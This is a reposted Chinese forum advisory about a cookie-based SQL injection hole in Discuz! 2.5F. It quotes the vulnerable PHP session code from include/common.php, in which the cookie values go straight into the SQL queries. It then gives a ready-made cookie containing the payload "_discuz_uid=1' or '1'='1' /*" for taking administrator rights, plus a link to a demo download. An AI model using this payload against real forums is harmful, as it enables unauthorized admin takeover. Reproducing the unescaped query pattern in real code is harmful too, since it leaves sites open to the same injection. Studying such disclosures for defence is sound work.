[转载]Discuz! 2.5F cookie未过滤漏洞
漏洞提供:火狐技术联盟-我非我 [[url]www.wrsky.com[/url]]漏洞说明:
Discuz! 2.5F新版论坛 COOKIE未过滤 通过本地构造可获取管理员权限
具体描述:
文件include\common.php中87行
=================================code begin==========================================================
$discuz_uid = $_COOKIE['_discuz_uid']; //这里没有进行过滤检测
$discuz_pw = $_COOKIE['_discuz_pw'];
$discuz_secques = $_COOKIE['_discuz_secques'];
$newpm = $newpmexists = $sessionexists = $adminid = $adminglobal = 0;
$userinfo="m.uid AS discuz_uid, m.username AS discuz_user, m.password AS discuz_pw, m.adminid, m.groupid, m.email, m.timeoffset,m.tpp, m.ppp, m.credit, m.timeformat, m.dateformat, m.signature, m.invisible, m.lastvisit, m.lastpost, m.newpm, m.accessmasks, m.regdate";
//这里直接就放入mysql执行了..
if($sid) {
if($discuz_uid) {
$query = $db->query("SELECT s.sid, s.styleid, s.groupid='6' AS ipbanned, $userinfo FROM $table_sessions s, $table_members m WHERE m.uid=s.uid AND s.sid='$sid' AND CONCAT_WS('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip' AND m.uid='$discuz_uid' AND m.password='$discuz_pw' AND m.secques='$discuz_secques'");
} else {
$query = $db->query("SELECT sid, uid AS sessionuid, groupid, groupid='6' AS ipbanned, styleid FROM $table_sessions WHERE sid='$sid' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'");
}
if($_DSESSION = $db->fetch_array($query)) {
$sessionexists = 1;
if(!empty($_DSESSION['sessionuid'])) {
$query = $db->query("SELECT $userinfo FROM $table_members m WHERE uid='$_DSESSION[sessionuid]'");
$_DSESSION = array_merge($_DSESSION, $db->fetch_array($query));
}
} else {
$query = $db->query("SELECT sid, groupid, groupid='6' AS ipbanned, styleid FROM $table_sessions WHERE sid='$sid' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'");
if($_DSESSION = $db->fetch_array($query)) {
clearcookies();
$sessionexists = 1;
}
}
}
if(!$sessionexists) {
..........................................
====================================code end==========================================================
本地cookie构造方式:
sid=dAgM7P; _cookietime=2592000; expand_menu=0__3; _discuz_uid=1' or '1'='1' /*; _discuz_pw=wofeiwo; _discuz_secques=hehe
漏洞演示动画下载:
[url]http://fox.wrsky.com/attachments/month_0501/if8l_Discuz25F.rar[/url]
页:
[1]